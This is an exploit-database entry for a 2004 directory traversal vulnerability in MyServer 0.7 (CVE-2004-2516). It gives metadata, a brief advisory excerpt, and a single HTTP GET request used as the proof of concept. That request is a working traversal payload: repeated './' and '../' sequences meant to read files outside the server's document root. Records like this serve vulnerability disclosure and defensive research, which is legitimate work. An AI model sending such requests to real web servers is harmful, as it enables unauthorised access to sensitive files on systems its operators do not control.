[] NeoSense

myserver 0.7 - Directory Traversal

Author: scrap
type: remote
platform: windows
port: 
date_added: 2004-09-15 
date_updated: 2013-03-05 
verified: 1 
codes: CVE-2004-2516;OSVDB-10001 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/11189/info

MyServer is reported prone to a remote directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. This vulnerability results in improper access to potentially sensitive files located outside of the document root of the web server.

MyServer version 0.7 is reportedly affected by this issue, however, other versions may be vulnerable as well.

"GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../"